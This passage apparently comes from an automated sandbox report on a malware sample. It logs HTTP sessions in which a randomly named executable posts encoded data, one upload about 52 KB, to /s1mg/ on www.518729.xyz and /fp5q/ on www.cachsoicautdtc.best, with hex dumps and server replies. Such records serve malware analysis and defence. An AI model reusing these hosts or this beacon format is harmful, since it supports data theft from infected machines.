"http://www.meetfactory.biz/o0e7?gp=1&js=1&uuid=1724738335.0053358673&other_args=eyJ1cmkiOiAiL28wZTciLCAiYXJncyI6ICJpajYwTXRZPXhIdWhpaEE1YTBSQ1FEcjdVcXBhd1QxY1lMOUJPcWdiZGdaMy8zOHdEN2xyU3JVNmxsSFV0MTlTZzY1VzRBSWtpSFJ6NjQwT3RGSGxPcmVwYm1xQ1JNTjBSbjNhOEh2SE5tNlIxV09PeU1VYXhjNVNkcUVCazRvPSZ3WEI9YnJ2NEVyYiIsICJyZWZlcmVyIjogIiIsICJhY2NlcHQiOiAidGV4dC9odG1sLGFwcGxpY2F0aW9uL3hodG1sK3htbCxhcHBsaWNhd [TRUNCATED]
                                                Aug 27, 2024 07:58:55.172358036 CEST55INData Raw: 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 2f 62 6f 64 79 3e 0a 3c 2f 68 74 6d 6c 3e 0d 0a 30 0d 0a 0d 0a
                                                Data Ascii: } </script> </body></html>0


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                9192.168.11.204985023.231.158.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:00.778865099 CEST808OUTPOST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 37 53 39 43 74 55 65 43 54 76 7a 71 6c 46 4a 47 38 6e 5a 72 48 4f 54 72 33 2b 47 76 34 58 6a 6a 73 45 42 4d 79 58 57 4a 32 5a 7a 63 4a 67 66 71 63 4f 67 37 4b 76 41 6c 79 4e 4d 47 39 79 4c 74 56 7a 6c 64 65 45 6c 53 56 4f 31 64 42 55 51 31 41 62 52 30 57 4a 62 31 61 74 6d 44 6a 6c 51 43 4c 69 4d 6f 70 31 52 6e 36 77 50 71 64 42 36 31 56 76 4e 52 42 4b 78 7a 44 75 4f 4a 52 35 43 62 31 50 6a 75 47 53 48 6f 6b 66 68 71 63 49 51 67 54 50 45 49 58 63 61 56 4e 4a 30 63 56 76 73 74 43 4c 4e 49 50 48 4a 42 57 76 69 6c 44 53 70 4b 5a 4c 4f 61 2f 6d 4d 31 64 67 68 54 76 6a 4a 31 6f 67 3d 3d
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqlFJG8nZrHOTr3+Gv4XjjsEBMyXWJ2ZzcJgfqcOg7KvAlyNMG9yLtVzldeElSVO1dBUQ1AbR0WJb1atmDjlQCLiMop1Rn6wPqdB61VvNRBKxzDuOJR5Cb1PjuGSHokfhqcIQgTPEIXcaVNJ0cVvstCLNIPHJBWvilDSpKZLOa/mM1dghTvjJ1og==


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                10192.168.11.204985123.231.158.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:03.624777079 CEST1148OUTPOST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 37 53 39 43 74 55 65 43 54 76 7a 71 6b 67 42 47 2b 47 5a 72 46 75 54 71 30 2b 47 76 78 33 6a 6e 73 45 64 4d 79 53 75 6a 32 4d 62 63 4a 41 76 71 64 50 67 37 4e 76 41 6c 36 74 4d 44 35 79 4c 6d 56 7a 70 72 65 46 5a 53 56 4f 68 64 41 6e 59 31 52 62 52 37 64 70 62 32 4d 64 6d 34 6e 6c 51 79 4c 69 78 44 70 30 31 6e 36 68 6a 71 63 48 6d 31 52 2b 4e 53 57 71 78 31 55 65 4f 4b 59 5a 43 56 31 50 2b 52 47 54 4f 54 6c 71 70 71 63 72 49 67 53 50 45 4a 64 73 61 53 41 70 31 65 62 2b 56 37 4f 76 78 59 66 32 70 79 55 4f 6d 6a 42 42 31 6e 58 36 47 45 6d 31 59 37 46 78 4e 46 35 43 67 6d 30 53 63 45 4d 34 59 47 50 39 53 2f 68 4d 71 49 4e 4b 71 36 61 70 4f 4f 33 63 36 54 4e 4d 4b 65 68 49 39 32 69 74 75 78 4f 51 4e 4c 70 66 6e 79 47 6f 43 46 73 6a 4e 31 41 67 68 2f 69 4a 4d 37 65 4a 2f 5a 77 77 72 65 63 64 72 58 2b 41 41 64 6e 54 77 4a 52 4a 53 4a 4d 64 38 75 33 6b 72 73 63 64 73 4b 52 6f 52 75 32 74 6c 6b 4d 74 2b 4c 65 63 76 6b 4f 35 54 45 76 49 31 44 71 6e 4f 4a 73 31 41 64 2b 36 4c 73 64 76 [TRUNCATED]
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqkgBG+GZrFuTq0+Gvx3jnsEdMySuj2MbcJAvqdPg7NvAl6tMD5yLmVzpreFZSVOhdAnY1RbR7dpb2Mdm4nlQyLixDp01n6hjqcHm1R+NSWqx1UeOKYZCV1P+RGTOTlqpqcrIgSPEJdsaSAp1eb+V7OvxYf2pyUOmjBB1nX6GEm1Y7FxNF5Cgm0ScEM4YGP9S/hMqINKq6apOO3c6TNMKehI92ituxOQNLpfnyGoCFsjN1Agh/iJM7eJ/ZwwrecdrX+AAdnTwJRJSJMd8u3krscdsKRoRu2tlkMt+LecvkO5TEvI1DqnOJs1Ad+6LsdvI1Ry5sEuI/Kfi3AnuxNGkMsA4yMqdl/QjThh+M3A/dU/HVrtDlBbHBZyS+WSIJagEUH/N5zKxosmFeY9i1wPWaAD09XKL2g9zL4BuGY0PklUjL9i7Hkeco+vY8xwEEVbm+pD1ZDNtZJ7cDr9e+glV1qb6ch7xPMrDYUvs7IE3tQC96Xuph3/4DApL5nofFi6ZuU6ORQw9a8hc=


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                11192.168.11.204985223.231.158.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:06.475186110 CEST1289OUTPOST /s1mg/ HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.518729.xyz
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 52932
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.518729.xyz/s1mg/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 37 53 39 43 74 55 65 43 54 76 7a 71 6b 67 42 47 2b 47 5a 72 46 75 54 71 30 2b 47 76 78 33 6a 6e 73 45 64 4d 79 53 75 6a 32 4d 44 63 49 7a 6e 71 63 73 34 37 4d 76 41 6c 77 4e 4d 43 35 79 4c 33 56 7a 42 33 65 46 55 74 56 4d 5a 64 41 30 67 31 52 4f 46 37 59 70 62 33 53 4e 6d 41 6a 6c 51 59 4c 69 4e 58 70 30 51 61 36 77 6e 71 64 41 4b 31 56 4e 56 52 4d 61 78 7a 55 65 4f 47 63 5a 44 6f 31 50 72 4d 47 54 43 54 6c 75 56 71 64 5a 41 67 55 59 51 4a 65 4d 61 52 4c 4a 31 72 55 65 56 4b 4f 75 52 71 66 32 70 45 55 50 53 6a 42 43 74 6e 57 39 36 44 6d 56 59 37 61 42 4e 45 72 79 63 69 30 53 6f 63 4d 34 38 47 50 36 75 2f 69 73 71 49 49 70 79 35 64 4a 4f 41 7a 63 36 2b 66 38 57 57 68 4d 56 45 69 73 4b 78 4f 42 70 4c 6f 73 2f 79 44 4b 71 46 6d 6a 4e 7a 64 51 68 73 34 35 4d 52 65 4a 50 2f 77 78 4c 6b 63 64 66 58 6b 6b 55 64 69 32 51 4f 59 4a 53 31 41 39 38 37 38 45 6e 65 63 63 42 52 52 6f 52 2b 32 70 64 6b 4d 64 4f 4c 64 59 37 6c 4f 70 54 66 70 49 31 73 7a 32 79 66 73 7a 6c 51 2b 35 62 47 64 6f [TRUNCATED]
                                                Data Ascii: ij60MtY=7S9CtUeCTvzqkgBG+GZrFuTq0+Gvx3jnsEdMySuj2MDcIznqcs47MvAlwNMC5yL3VzB3eFUtVMZdA0g1ROF7Ypb3SNmAjlQYLiNXp0Qa6wnqdAK1VNVRMaxzUeOGcZDo1PrMGTCTluVqdZAgUYQJeMaRLJ1rUeVKOuRqf2pEUPSjBCtnW96DmVY7aBNEryci0SocM48GP6u/isqIIpy5dJOAzc6+f8WWhMVEisKxOBpLos/yDKqFmjNzdQhs45MReJP/wxLkcdfXkkUdi2QOYJS1A9878EneccBRRoR+2pdkMdOLdY7lOpTfpI1sz2yfszlQ+5bGdo41QS5sBNw8Cvi6fXunJGkbsAEUMrZ1/hfTgRuM1g/eEPHJgNDnFbHBZyWAWSUJa1wUBNF5ws5oqmFEY9iewPa5AD8TXL7Ig+fL4weGMVPl10jK3C7cgeQz+rw0xz95Ws++oDlZIttWMbcI9tf7klZpqbmqh71fMoDYFYIlbVXmLjMtSKtB1PwkF+L3jZTPksNWWMyvBBdmqnqA13/f8mZcq0I6m72uUmj4tSncpO6cOnQ61N8T0LX7CUH6wfQekqIps6swMhFgzsUrn7YhRHTaZNhV6yR1yUsWzBDT7fKMFdJQl5sZmyMPJwCtnjRS24LjJwpOgZA/VehYBCqH1NI4t/I
                                                Aug 27, 2024 07:59:06.475239038 CEST5156OUTData Raw: 6b 6e 47 6c 52 5a 73 61 70 39 6d 44 78 41 48 6e 51 55 6b 4b 33 51 51 45 6b 61 4f 55 71 48 63 6d 4e 78 65 41 69 38 52 30 63 6d 5a 7a 34 73 55 72 39 43 37 51 4c 44 57 55 2b 71 62 42 70 55 46 57 34 6f 43 71 70 38 79 45 75 58 79 33 2b 37 6c 53 4e 73
                                                Data Ascii: knGlRZsap9mDxAHnQUkK3QQEkaOUqHcmNxeAi8R0cmZz4sUr9C7QLDWU+qbBpUFW4oCqp8yEuXy3+7lSNsAGYEtLJqQiDaA6YZ3x2MA0vulOw1qLkmWOVQIlVUJ57Uzy6DAA6T6rpAqFtRLR3mZdmF0I/oaAA36eQRq+0EYY03bhVOnCmLM0p/IfosivljJYTlyGYAYZgU0rj6s3q6300XGlTd3oybrhB9W5vREwrVPMdTHLFGe
                                                Aug 27, 2024 07:59:06.475286007 CEST6445OUTData Raw: 37 54 71 37 47 4f 58 66 4d 64 69 4e 71 78 66 46 4b 57 77 34 62 6e 49 78 5a 57 64 76 5a 63 67 70 73 71 2f 6b 50 33 55 76 44 49 44 6e 56 37 46 49 33 6a 46 58 32 44 31 4a 41 35 62 6d 34 52 53 33 68 41 79 67 34 6a 4f 6a 77 63 74 56 64 34 52 63 70 39
                                                Data Ascii: 7Tq7GOXfMdiNqxfFKWw4bnIxZWdvZcgpsq/kP3UvDIDnV7FI3jFX2D1JA5bm4RS3hAyg4jOjwctVd4Rcp9LVT2epDPas4oq0wKbKTdMHytdi2IlYau+nZ2kGRjzLbS/6N0v/Zy1xaJhkZfIqiFgKXDzTngap/10yNCNYwJK3rsM0j7qs+lkTjLwmG67okLj1a57skdfkyXeA7dDYpG2jEeQ1B9Z/2xsOyY4jOYPQnXLKaPiOW1X
                                                Aug 27, 2024 07:59:06.794689894 CEST2578OUTData Raw: 67 48 76 5a 56 4c 70 4d 36 42 7a 70 65 6c 48 77 35 73 47 43 6a 55 58 68 47 75 36 6a 72 6c 43 63 33 32 51 50 45 65 2f 37 72 51 78 35 62 48 52 56 70 55 4a 75 39 5a 69 4e 63 33 5a 46 36 6e 6b 4c 54 59 30 42 48 70 56 7a 4d 31 74 36 59 52 4a 77 4e 6e
                                                Data Ascii: gHvZVLpM6BzpelHw5sGCjUXhGu6jrlCc32QPEe/7rQx5bHRVpUJu9ZiNc3ZF6nkLTY0BHpVzM1t6YRJwNnNYe3ZWc2Q9x8GrriRFuz1oEPOHcorgJs/mg8eQvBqFnaAcixvAFtpHR3DfcyUvG5q7TEyehVGIeLLZuwoHiN7mGn60DeNSUeE6Zd1YRLxsmrCEZDcBRd7ZXcReOdNEehHWdK3C8IX5lYbLPBFgdkWIngbUCd8F8z1
                                                Aug 27, 2024 07:59:06.795053005 CEST1289OUTData Raw: 57 39 35 76 62 51 77 77 5a 70 38 31 77 70 67 73 4d 68 54 53 2b 54 4d 56 77 30 68 64 56 62 6b 67 79 50 57 45 43 4d 47 76 6c 35 42 73 6b 57 66 79 76 53 67 2b 6f 34 46 47 2f 4a 72 79 4c 6a 6f 49 62 66 42 73 39 68 33 35 2f 35 37 43 4f 37 59 6e 72 73
                                                Data Ascii: W95vbQwwZp81wpgsMhTS+TMVw0hdVbkgyPWECMGvl5BskWfyvSg+o4FG/JryLjoIbfBs9h35/57CO7Ynrs2dnrC+K+aYFgmVsEk50RFz2SSgcPCZZkeOt/uFOoOmlNKFdhh/MZ2Vw5LpeRxXk5LwFPCEV8rICOlzjWSKs0LoK0J6e9fZFB+Adbp7GqIVdQnLDvUgLgWs7m5gOc78HTETufKM80hxlXsnj/Tw7DGXI2Ct+XR67ew
                                                Aug 27, 2024 07:59:06.795223951 CEST3867OUTData Raw: 33 39 6f 30 2b 4e 68 4b 4c 45 4a 64 45 47 33 54 4b 36 63 4f 32 58 32 78 48 7a 41 34 65 38 31 6d 61 38 65 35 37 62 4f 6c 68 38 35 39 6b 61 41 50 72 64 37 34 33 35 4b 70 33 59 4c 33 4a 35 63 36 70 58 37 75 51 4d 76 30 36 64 4a 39 64 63 57 69 31 30
                                                Data Ascii: 39o0+NhKLEJdEG3TK6cO2X2xHzA4e81ma8e57bOlh859kaAPrd7435Kp3YL3J5c6pX7uQMv06dJ9dcWi10g0LR7LvrztL3YIN5MuOMFbuu7lnSBC9emVfAxtEPEkXTEyONVM1DvNmu8j5sdZyAYFiaw7LIPafq8ARFMWc6moS0CE1AWgc/5MhkHcK4sJ9RoHRdG2iXoe15K86fOUclvftVHx1jCi+BFR++mykssixGculxF6XkR
                                                Aug 27, 2024 07:59:06.795273066 CEST5156OUTData Raw: 67 49 6e 6f 4d 4f 6f 46 4c 47 53 6e 4a 31 50 66 56 42 4c 70 76 57 39 42 53 5a 78 61 4c 4c 50 59 73 58 2b 50 31 61 48 47 2b 57 35 78 6e 73 78 38 4f 52 69 34 4b 73 45 31 38 4c 33 57 30 57 50 53 32 71 78 55 49 51 33 5a 53 55 42 38 39 4f 5a 49 7a 77
                                                Data Ascii: gInoMOoFLGSnJ1PfVBLpvW9BSZxaLLPYsX+P1aHG+W5xnsx8ORi4KsE18L3W0WPS2qxUIQ3ZSUB89OZIzwyusJXr1ehlrhV/ZeujuPMyPXd/lN+zFv5KgHET0FE7eQjnYGpWI1KG795CqjmgimE8aHW0Mb7aiC2C9YMatYFxMofbkmcrIbKFXAcLOUqr/A0mEW9D733CVQMzNzHgLH1g3onANlVXf/q/8mdbh6TWiC7wxd+85z5
                                                Aug 27, 2024 07:59:06.795361996 CEST10312OUTData Raw: 59 67 32 34 30 4f 39 6c 7a 55 70 61 31 68 45 41 55 32 31 74 39 34 43 76 4f 33 38 37 6e 74 43 6e 49 49 45 34 48 49 33 7a 4c 6f 58 32 38 56 2b 62 6a 6d 58 71 61 63 33 77 43 37 5a 50 32 61 6b 5a 57 46 45 67 4a 36 4a 71 75 33 64 67 30 43 66 79 6a 30
                                                Data Ascii: Yg240O9lzUpa1hEAU21t94CvO387ntCnIIE4HI3zLoX28V+bjmXqac3wC7ZP2akZWFEgJ6Jqu3dg0Cfyj09fraFKo07PaChWCKuUKg26S4y+E79XPdUe+xzFowPDPayaHHnF1Q56gvKiNoiNMAQb39jQ3h6EVNga90KljSlC9ofSwS69xhAMIJziQiVScgX6OP0UwKWYrXb71Tn255CLdmoFsWZySF/X/Bvt93ZOgsb1+DLiceF
                                                Aug 27, 2024 07:59:06.795527935 CEST1289OUTData Raw: 43 77 79 73 78 65 6a 6f 2b 59 74 67 33 50 68 2f 44 62 33 52 59 48 56 4b 37 6c 59 4e 66 31 41 39 69 59 70 59 77 51 5a 47 79 4e 39 4f 72 7a 4f 52 68 2f 32 44 38 54 47 42 71 6b 2b 65 49 43 50 65 64 31 6c 32 59 66 58 61 76 42 78 58 4e 4d 57 4a 67 63
                                                Data Ascii: Cwysxejo+Ytg3Ph/Db3RYHVK7lYNf1A9iYpYwQZGyN9OrzORh/2D8TGBqk+eICPed1l2YfXavBxXNMWJgcr/b2z6NvIHuPPVft5k08pwRXw1cx/iBbHJADm9EdZFoC3/DkXJWr3q4Z2HwKo8NTJIITHXijeHk5X2Rc/T7v4fgmeqcxhLEYuJateyws94nWfdEfj4ufXqaIAqkDSxtcvwl/4Afu58PxQ2WUK8Cx3H+xBAZyL9Aar
                                                Aug 27, 2024 07:59:06.795697927 CEST1289OUTData Raw: 74 33 4a 65 31 39 6f 71 46 69 2f 2b 6e 49 41 56 78 63 4a 72 47 6d 44 68 2f 4b 53 46 45 52 71 49 4d 50 62 4a 71 79 50 4e 44 6e 63 5a 32 39 31 52 4b 47 46 74 30 75 4c 6c 65 71 46 53 49 66 59 59 7a 70 38 2f 6f 46 70 4c 4d 55 49 66 70 73 4d 36 68 47
                                                Data Ascii: t3Je19oqFi/+nIAVxcJrGmDh/KSFERqIMPbJqyPNDncZ291RKGFt0uLleqFSIfYYzp8/oFpLMUIfpsM6hGhnWMVa7rbL7KXeDMvGZCtI1Wuo0mYK9s3z16aOCoJYPNKy9wdsAdd4InKLE5OB5hdu5M8TpovnK2RDf2bG1EHzY/6Zmg71tNl94jynaYgtijAwiOWiQAQSTe11IxkZDPCvndXGIN3TQJivJbMdBjx/WccSVhevZG5


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                12192.168.11.204985323.231.158.3807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:09.322065115 CEST544OUTGET /s1mg/?ij60MtY=2QViuhW/NYaw5nxi+F1oVZq46szrrR71oUxOni/Qn+PFEj/1SakqFOMu9uwTuSiQaklPQGQrKMR1DX8jJ/FrQ8LNcsmQ9XMkBTdB/FoVvRnsRxC4QNxtOLg=&wXB=brv4Erb HTTP/1.1
                                                Host: www.518729.xyz
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Language: en-us
                                                Connection: close
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                13192.168.11.2049854172.67.191.241807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:14.967185020 CEST835OUTPOST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 204
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 5a 4c 47 52 55 37 41 54 33 49 73 59 75 2b 66 74 77 56 57 75 6c 52 57 61 46 62 47 4e 33 42 6b 63 4d 6d 47 30 32 30 39 4a 2f 37 79 4e 57 37 46 6f 58 4e 42 56 36 51 30 6d 4c 39 57 67 64 77 2b 56 4c 33 32 65 49 4d 71 48 38 4b 72 38 4e 65 65 31 58 48 59 32 4a 6d 79 67 6c 32 59 43 4f 50 4a 76 63 7a 71 72 6f 76 71 64 44 6d 5a 73 35 56 61 6d 4e 31 38 45 39 39 51 34 37 55 48 44 56 72 4b 44 53 4d 5a 49 31 55 51 58 63 50 6b 72 52 74 58 6a 66 2b 51 42 65 6b 44 75 71 71 6a 58 46 42 62 4b 2b 43 61 32 36 39 6b 52 45 65 30 53 4c 45 41 4d 49 45 43 45 36 41 3d 3d
                                                Data Ascii: ij60MtY=sROdxZs/CdFUZLGRU7AT3IsYu+ftwVWulRWaFbGN3BkcMmG0209J/7yNW7FoXNBV6Q0mL9Wgdw+VL32eIMqH8Kr8Nee1XHY2Jmygl2YCOPJvczqrovqdDmZs5VamN18E99Q47UHDVrKDSMZI1UQXcPkrRtXjf+QBekDuqqjXFBbK+Ca269kREe0SLEAMIECE6A==
                                                Aug 27, 2024 07:59:15.080246925 CEST861INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:15 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:15 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=U6jDnhQojZdvarxqWgltmUV0LMN2RfsS%2FxUOHvTEAvsMOGs97OecMfmUGFgQXCN68gb80MSJXiG1hfqYCUmSIhYHzvoSsw4VQgJE76SIMlbiSQPl8La594aXHoO7iqiyYojBtb10wm3h%2Bg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
                                                CF-RAY: 8b99d59ee9d75728-IAD
                                                alt-svc: h3=":443"; ma=86400
                                                Data Raw: 3c 68 74 6d 6c 3e 0d 0a 3c 68 65 61 64 3e 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 3c 2f 68 65 61 64 3e 0d 0a 3c 62 6f 64 79 3e 0d 0a 3c 63 65 6e 74 65 72 3e 3c 68 31 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 68 72 3e 3c 63 65 6e 74 65 72 3e 63 6c 6f 75 64 66 6c 61 72 65 3c 2f 63 65 6e 74 65 72 3e 0d 0a 3c 2f 62 6f 64 79 3e 0d 0a 3c 2f 68 74 6d 6c 3e 0d 0a
                                                Data Ascii: <html><head><title>301 Moved Permanently</title></head><body><center><h1>301 Moved Permanently</h1></center><hr><center>cloudflare</center></body></html>


                                                Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                14192.168.11.2049855172.67.191.241807116C:\Program Files (x86)\bCIDzIKdioIOWaLkVALMCJZbzLSppNPLrokYvYYmIhPKpvmJHwYNldubsKptZpizeTUZYkvKKUayql\kCwueywDTS.exe
                                                TimestampBytes transferredDirectionData
                                                Aug 27, 2024 07:59:17.597347021 CEST1175OUTPOST /fp5q/ HTTP/1.1
                                                Host: www.cachsoicautdtc.best
                                                Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7
                                                Accept-Encoding: gzip, deflate, br
                                                Accept-Language: en-us
                                                Origin: http://www.cachsoicautdtc.best
                                                Cache-Control: no-cache
                                                Connection: close
                                                Content-Length: 544
                                                Content-Type: application/x-www-form-urlencoded
                                                Referer: http://www.cachsoicautdtc.best/fp5q/
                                                User-Agent: Mozilla/5.0 (Windows Phone 10.0; Android 4.2.1; DEVICE INFO) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/42.0.2311.135 Mobile Safari/537.36 Edge/12.<OS build number>
                                                Data Raw: 69 6a 36 30 4d 74 59 3d 73 52 4f 64 78 5a 73 2f 43 64 46 55 59 71 32 52 58 61 41 54 78 6f 73 5a 77 75 66 74 2b 31 57 71 6c 52 61 61 46 66 65 64 33 54 77 63 4d 44 69 30 33 31 39 4a 36 37 79 4e 65 62 46 68 4b 64 42 65 36 51 34 41 4c 39 71 67 64 77 71 56 4c 41 32 65 4f 38 71 45 30 71 71 4f 4b 65 65 32 41 58 59 38 4a 6d 2b 53 6c 30 6b 43 4f 38 4e 76 64 78 53 72 73 37 2b 65 56 32 5a 71 6f 31 61 6c 57 6c 38 65 39 39 55 4b 37 57 58 35 57 59 57 44 53 73 35 49 30 55 51 55 48 76 6b 67 59 4e 57 74 61 66 52 6b 66 48 33 36 6b 73 37 4b 45 6a 6a 6c 31 68 75 30 7a 75 51 4b 53 72 38 77 4b 58 68 67 48 58 48 33 74 4e 6c 7a 6e 61 34 4b 32 54 6b 78 66 51 57 2f 6e 69 2f 65 32 48 4a 45 79 2b 79 53 6f 52 75 2f 44 38 6a 54 75 34 65 75 33 48 75 35 68 7a 6d 57 58 67 36 6b 38 30 55 52 63 6e 59 64 44 65 71 56 38 46 42 6e 50 74 33 68 78 7a 76 55 65 2f 37 76 30 6e 52 33 34 70 71 42 49 31 77 33 70 76 4b 62 2b 36 74 62 7a 55 77 77 42 35 61 39 47 77 4e 32 42 6d 76 6c 78 68 54 4f 32 49 54 41 42 4f 5a 4e 79 4d 6e 2b 42 43 6e 33 6d 75 [TRUNCATED]
                                                Data Ascii: ij60MtY=sROdxZs/CdFUYq2RXaATxosZwuft+1WqlRaaFfed3TwcMDi0319J67yNebFhKdBe6Q4AL9qgdwqVLA2eO8qE0qqOKee2AXY8Jm+Sl0kCO8NvdxSrs7+eV2Zqo1alWl8e99UK7WX5WYWDSs5I0UQUHvkgYNWtafRkfH36ks7KEjjl1hu0zuQKSr8wKXhgHXH3tNlzna4K2TkxfQW/ni/e2HJEy+ySoRu/D8jTu4eu3Hu5hzmWXg6k80URcnYdDeqV8FBnPt3hxzvUe/7v0nR34pqBI1w3pvKb+6tbzUwwB5a9GwN2BmvlxhTO2ITABOZNyMn+BCn3muKjXLca6BuBA3fcr1XjznpJsD2WBQZzH+QMReya0qQxk9X7gzME43XF+e8CEl2AV6vFzLy2CKywjt/+RKuJuvE+wuWvt1Hw7ejkGGwFQdA1uHI8JVyZzUhYGjb+JCl9WUKBP+7wGV4JZuH0r8fCp5X9dKTUnqhDrx8hf7GLVQiw0dhr0gr9lAPzeIVynpIZXo8+aFkhMpcOSjQ=
                                                Aug 27, 2024 07:59:17.714504004 CEST865INHTTP/1.1 301 Moved Permanently
                                                Date: Tue, 27 Aug 2024 05:59:17 GMT
                                                Content-Type: text/html
                                                Content-Length: 167
                                                Connection: close
                                                Cache-Control: max-age=3600
                                                Expires: Tue, 27 Aug 2024 06:59:17 GMT
                                                Location: https://www.cachsoicautdtc.best/fp5q/
                                                Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=R1sK7%2B9YLzBcOrZHiUyJhu%2FxMuIpCLsDFh9U9Lc2RRe7WUR4SYPCPf8xFwhsojgsCil1OnpiI7vPPzc%2FydCtUt%2BUdBAIkpNeuuNkCAmWznLHW4h73work7alkMIEvztMHkxmUaw1UMETog%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                Vary: Accept-Encoding
                                                Server: cloudflare
